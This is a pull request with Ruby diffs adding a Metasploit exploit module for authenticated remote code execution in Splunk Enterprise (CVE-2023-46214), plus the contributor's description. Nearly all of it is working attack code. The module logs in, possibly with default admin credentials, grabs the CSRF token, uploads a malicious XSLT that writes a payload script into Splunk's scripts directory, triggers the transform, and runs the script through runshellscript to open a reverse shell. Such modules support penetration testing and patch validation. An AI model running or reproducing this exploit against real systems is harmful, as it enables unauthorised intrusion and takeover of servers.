+      fail_with(Failure::Unknown, 'XSLT Transform failed')
+    end
+
+    unless trigger_reverse_shell(jsid, csrf_token, updated_cookie_string)
+      fail_with(Failure::Unknown, 'Failed to execute reverse shell')
+    end
+  end
+
+  def check
+    print_status('Version check is not implemented. Assuming the target is vulnerable.')
+    CheckCode::Appears
+  end
+
+  def trigger_reverse_shell(jsid, csrf_token, cookie_string)
+    return false unless jsid && csrf_token
+
+    runshellscript_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')
+    runshellscript_data = {
+      'search' => "|runshellscript \"shell.sh\" \"\" \"\" \"\" \"\" \"\" \"\" \"\" \"#{jsid}\""
+    }
+
+    upload_headers = {
+      'User-Agent' => 'Axer Framework',
+      'X-Requested-With' => 'XMLHttpRequest',
+      'X-Splunk-Form-Key' => csrf_token,
+      'Cookie' => cookie_string
+    }
+
+    print_status("Executing reverse shell command at #{runshellscript_url}")
+    res = send_request_cgi(
+      'uri' => runshellscript_url,
+      'method' => 'POST',
+      'vars_post' => runshellscript_data,
+      'headers' => upload_headers
+    )
+
+    unless res
+      print_error('Failed to execute reverse shell: No response received')
+      return false
+    end
+
+    if res.code == 201
+      print_good('Reverse shell command executed successfully')
+      true
+    else
+      print_error("Failed to execute reverse shell: Server returned status code #{res.code}")
+      false
+    end
+  end
+
+  def trigger_xslt_transform(jsid, text_value, cookie_string)
+    return false unless jsid && text_value
+
+    exploit_endpoint = normalize_uri(target_uri.path, 'en-US', 'api', 'search', 'jobs', jsid, 'results')
+    exploit_endpoint << "?xsl=/opt/splunk/var/run/splunk/dispatch/#{text_value}/shell.xsl"
+
+    xslt_headers = {
+      'X-Splunk-Module' => 'Splunk.Module.DispatchingModule',
+      'Connection' => 'close',
+      'Upgrade-Insecure-Requests' => '1',
+      'Accept-Language' => 'en-US,en;q=0.5',
+      'Accept-Encoding' => 'gzip, deflate',
+      'X-Requested-With' => 'XMLHttpRequest',
+      'Cookie' => cookie_string
+    }
+
+    print_status("Triggering XSLT transformation at #{exploit_endpoint}")
+    res = send_request_cgi(
+      'uri' => exploit_endpoint,
+      'method' => 'GET',
+      'headers' => xslt_headers
+    )
+
+    unless res
+      print_error('Failed to trigger XSLT transformation: No response received')
+      return false
+    end
+
+    if res.code == 200
+      print_good('XSLT transformation triggered successfully')
+      true
+    else
+      print_error("Failed to trigger XSLT transformation: Server returned status code #{res.code}")
+      false
+    end
+  end
+
+  def generate_malicious_xsl
+    encoded_payload = Rex::Text.html_encode(payload.encoded)
+
+    xsl_template = <<~XSL
+      <?xml version="1.0" encoding="UTF-8"?>
+      <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">
+        <xsl:template match="/">
+          <exsl:document href="/opt/splunk/bin/scripts/shell.sh" method="text">
+            <xsl:text>#{encoded_payload}</xsl:text>
+          </exsl:document>
+        </xsl:template>
+      </xsl:stylesheet>
+    XSL
+
+    xsl_template
+  end
+
+  def get_job_search_id(csrf_token, cookie_string)
+    return false, nil unless csrf_token
+
+    jsid_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')
+    jsid_url << '?output_mode=json'
+
+    upload_headers = {
+      'X-Requested-With' => 'XMLHttpRequest',
+      'X-Splunk-Form-Key' => csrf_token,
+      'Cookie' => cookie_string
+    }
+
+    jsid_data = {
+      'search' => '|search test|head 1'
+    }
+
+    print_status("Sending job search request to #{jsid_url}")
+    res = send_request_cgi(
+      'uri' => jsid_url,
+      'method' => 'POST',
+      'vars_post' => jsid_data,
+      'headers' => upload_headers
+    )
+
+    unless res
+      print_error('Failed to initiate job search: No response received')
+      return false, nil
+    end
+
+    jsid = JSON.parse(res.body)['sid']
+    return true, jsid if jsid
+  end
+
+  def upload_malicious_file(file_content, csrf_token, cookie_string)
+    unless csrf_token
+      print_error('CSRF token not found')
+      return false, nil
+    end
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(file_content, 'application/xslt+xml', nil, 'form-data; name="spl-file"; filename="shell.xsl"')
+
+    upload_headers = {
+      'Accept' => 'text/javascript, text/html, application/xml, text/xml, */*',
+      'X-Requested-With' => 'XMLHttpRequest',
+      'X-Splunk-Form-Key' => csrf_token,
+      'Cookie' => cookie_string
+    }
+
+    upload_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__upload', 'indexing', 'preview')
+    upload_url << '?output_mode=json&props.NO_BINARY_CHECK=1&input.path=shell.xsl'
+
+    res = send_request_cgi(
+      'uri' => upload_url,
+      'method' => 'POST',
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'headers' => upload_headers
+    )
+
+    unless res
+      print_error('Malicious file upload failed: No response received')
+      return false, nil
+    end
+
+    response_body = res.body
+    if response_body.nil? || response_body.empty?
+      print_error('Response body is empty')
+      return false, nil
+    end
+
+    response_data = nil
+    is_json = response_body.strip.start_with?('{') && response_body.strip.end_with?('}')
+
+    if is_json
+      response_data = JSON.parse(response_body)
+    else
+      print_error('Response is not in JSON format')
+      return false, nil
+    end
+
+    if response_data && response_data['messages'] && !response_data['messages'].empty?
+      text_value = response_data['messages'][0]['text']
+      if text_value.include?('concatenate')
+        print_error('Server responded with an error: concatenate found in the response')
+        return false, nil
+      end
+
+      print_good('Malicious file uploaded successfully')
+      return true, text_value
+    else
+      print_error('Server did not return a valid "messages" field')
+      return false, nil
+    end
+  end
+
+  def fetch_csrf_token(cookie_string)
+    print_status('Extracting CSRF token from cookies')
+
+    csrf_token_match = cookie_string.match(/splunkweb_csrf_token_8000=([^;]+)/)
+
+    if csrf_token_match
+      csrf_token = csrf_token_match[1]
+      print_good("CSRF token successfully extracted: #{csrf_token}")
+
+      en_us_url = normalize_uri(target_uri.path, 'en-US', 'app', 'launcher', 'home')
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => en_us_url,
+        'cookie' => cookie_string
+      })
+
+      if res && res.code == 200
+        new_cookies = res.get_cookies
+        updated_cookie_string = cookie_string + new_cookies
+      else
+        updated_cookie_string = cookie_string
+      end
+
+      return [csrf_token, updated_cookie_string]
+    else
+      fail_with(Failure::NotFound, 'CSRF token not found in cookies')
+      return [nil, nil]
+    end
+  end
+
+  def authenticate
+    login_url = normalize_uri(target_uri.path, 'en-US', 'account', 'login')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => login_url
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'No response received for authentication request')
+      return [false, nil]
+    end
+
+    cval_value = res.get_cookies.match(/cval=([^;]*)/)[1]
+
+    unless cval_value
+      fail_with(Failure::UnexpectedReply, 'Failed to retrieve the cval cookie for authentication')
+      return [false, nil]
+    end
+
+    auth_payload = {
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'cval' => cval_value,
+      'set_has_logged_in' => 'false'
+    }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => login_url,
+      'cookie' => res.get_cookies,
+      'vars_post' => auth_payload
+    })
+
+    if res && res.code == 200
+      print_good('Successfully authenticated on the Splunk instance')
+      return [true, res.get_cookies]
+    else
+      fail_with(Failure::NoAccess, 'Failed to authenticate on the Splunk instance')
+      return [false, nil]
+    end
+  end
+end

--- a/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
+++ b/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
@@ -15,13 +15,21 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Splunk Authenticated XSLT Upload RCE',
         'Description' => %q{
-          This exploit module targets a Remote Code Execution vulnerability in Splunk Enterprise.
-          Vulnerable versions include 9.0.x before 9.0.7 and 9.1.x before 9.1.2.
-          Successful exploitation requires valid credentials (default: admin:changeme).
+          This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.
+          The affected versions include 9.0.x before 9.0.7 and 9.1.x before 9.1.2. The exploitation process leverages
+          a weakness in the XSLT transformation functionality of Splunk. Successful exploitation requires valid
+          credentials, typically 'admin:changeme' by default.
+
+          The exploit involves uploading a malicious XSLT file to the target system. This file, when processed by the
+          vulnerable Splunk server, leads to the execution of arbitrary code. The module then utilizes the 'runshellscript'
+          capability in Splunk to execute the payload, which can be tailored to establish a reverse shell. This provides
+          the attacker with remote control over the compromised Splunk instance. The module is designed to work
+          seamlessly, ensuring successful exploitation under the right conditions.
         },
         'Author' => [
           'nathan', # Writeup and PoC
           'Valentin Lobstein', # Metasploit module
+          'h00die', # Assistance in module development
         ],
         'License' => MSF_LICENSE,
         'References' => [

--- a/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
+++ b/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
@@ -13,19 +13,22 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => '(Authenticated) RCE in Splunk (9.0.x to 9.0.7, 9.1.x to 9.1.2)',
+        'Name' => 'Splunk Authenticated XSLT Upload RCE',
         'Description' => %q{
           This exploit module targets a Remote Code Execution vulnerability in Splunk Enterprise.
           Vulnerable versions include 9.0.x before 9.0.7 and 9.1.x before 9.1.2.
           Successful exploitation requires valid credentials (default: admin:changeme).
         },
         'Author' => [
-          'Valentin Lobstein' # Metasploit module
+          'nathan', # Writeup and PoC
+          'Valentin Lobstein', # Metasploit module
         ],
         'License' => MSF_LICENSE,
         'References' => [
           ['CVE', '2023-46214'],
-          ['URL', 'https://github.com/nathan31337/Splunk-RCE-poc']
+          ['URL', 'https://github.com/nathan31337/Splunk-RCE-poc'],
+          [ 'URL', 'https://advisory.splunk.com/advisories/SVD-2023-1104' ], # Vendor Advisory
+          [ 'URL', 'https://blog.hrncirik.net/cve-2023-46214-analysis' ], # Writeup
         ],
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_PHP, ARCH_CMD],
@@ -39,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS]
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
         }
       )
     )
@@ -59,28 +62,32 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
+    sleep(0.3)
     csrf_token, updated_cookie_string = fetch_csrf_token(cookie_string)
     unless csrf_token
       fail_with(Failure::NoAccess, 'Failed to obtain CSRF token')
       return
     end
 
+    sleep(0.3)
     malicious_xsl = generate_malicious_xsl
-
     uploaded, text_value = upload_malicious_file(malicious_xsl, csrf_token, updated_cookie_string)
     unless uploaded
       fail_with(Failure::Unknown, 'File upload failed')
     end
 
+    sleep(0.3)
     jsid_created, jsid = get_job_search_id(csrf_token, updated_cookie_string)
     unless jsid_created
       fail_with(Failure::Unknown, 'Creating job failed')
     end
 
+    sleep(0.3)
     unless trigger_xslt_transform(jsid, text_value, updated_cookie_string)
       fail_with(Failure::Unknown, 'XSLT Transform failed')
     end
 
+    sleep(0.3)
     unless trigger_reverse_shell(jsid, csrf_token, updated_cookie_string)
       fail_with(Failure::Unknown, 'Failed to execute reverse shell')
     end
@@ -137,11 +144,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res.code == 201
       print_good('Reverse shell command executed successfully')
-      true
-    else
-      print_error("Failed to execute reverse shell: Server returned status code #{res.code}")
-      false
+      return true
     end
+    print_error("Failed to execute reverse shell: Server returned status code #{res.code}")
+    false
   end
 
   def trigger_xslt_transform(jsid, text_value, cookie_string)
@@ -174,11 +180,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res.code == 200
       print_good('XSLT transformation triggered successfully')
-      true
-    else
-      print_error("Failed to trigger XSLT transformation: Server returned status code #{res.code}")
-      false
+      return true
     end
+    print_error("Failed to trigger XSLT transformation: Server returned status code #{res.code}")
+    false
   end
 
   def generate_malicious_xsl
@@ -202,7 +207,6 @@ class MetasploitModule < Msf::Exploit::Remote
     return false, nil unless csrf_token
 
     jsid_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')
-    jsid_url << '?output_mode=json'
 
     upload_headers = {
       'X-Requested-With' => 'XMLHttpRequest',
@@ -219,7 +223,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => jsid_url,
       'method' => 'POST',
       'vars_post' => jsid_data,
-      'headers' => upload_headers
+      'headers' => upload_headers,
+      'vars_get' => { 'output_mode' => 'json' }
     )
 
     unless res
@@ -248,14 +253,18 @@ class MetasploitModule < Msf::Exploit::Remote
     }
 
     upload_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__upload', 'indexing', 'preview')
-    upload_url << '?output_mode=json&props.NO_BINARY_CHECK=1&input.path=shell.xsl'
 
     res = send_request_cgi(
       'uri' => upload_url,
       'method' => 'POST',
       'data' => post_data.to_s,
       'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
-      'headers' => upload_headers
+      'headers' => upload_headers,
+      'vars_get' => {
+        'output_mode' => 'json',
+        'props.NO_BINARY_CHECK' => 1,
+        'input.path' => 'shell.xsl'
+      }
     )
 
     unless res
@@ -280,7 +289,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if response_data && response_data['messages'] && !response_data['messages'].empty?
-      text_value = response_data['messages'][0]['text']
+      text_value = response_data.dig('messages', 0, 'text')
       if text_value.include?('concatenate')
         print_error('Server responded with an error: concatenate found in the response')
         return false, nil


### PR DESCRIPTION
fixes #18563 
Hello,

I've developed a Remote Code Execution (RCE) module for Splunk Enterprise. This module exploits a vulnerability in the XSLT transformation functionality of certain versions of Splunk Enterprise, allowing for authenticated remote code execution.

#### Key Points of the PR:
- The exploit targets Splunk Enterprise versions 9.0.x before 9.0.7 and 9.1.x before 9.1.2.
- It requires valid credentials for successful exploitation. Default credentials (admin:changeme) can be used if they haven't been changed.
- The exploit leverages the XSLT transformation process to execute arbitrary code on the vulnerable server.

#### Current Status:
- The RCE module is functional and can be used to gain remote access to vulnerable Splunk instances.
- However, the version check functionality (`check` method) is not yet implemented. I'm currently unable to directly determine the Splunk version to validate if the target is vulnerable.

#### Going Forward:
- I plan to continue researching ways to accurately determine the Splunk version remotely. 
- In the meantime, I believe it is valuable to make this module available for testing and potential use, with the understanding that users need to manually verify the target version.

#### Request for Collaboration:
- Any assistance or suggestions on implementing the version check would be greatly appreciated.
- Feedback on the current implementation of the RCE module is also welcome.

Thank you for considering this contribution to the project. I'm looking forward to any feedback and the opportunity to collaborate further on enhancing this module.

Best regards,

Chocapikk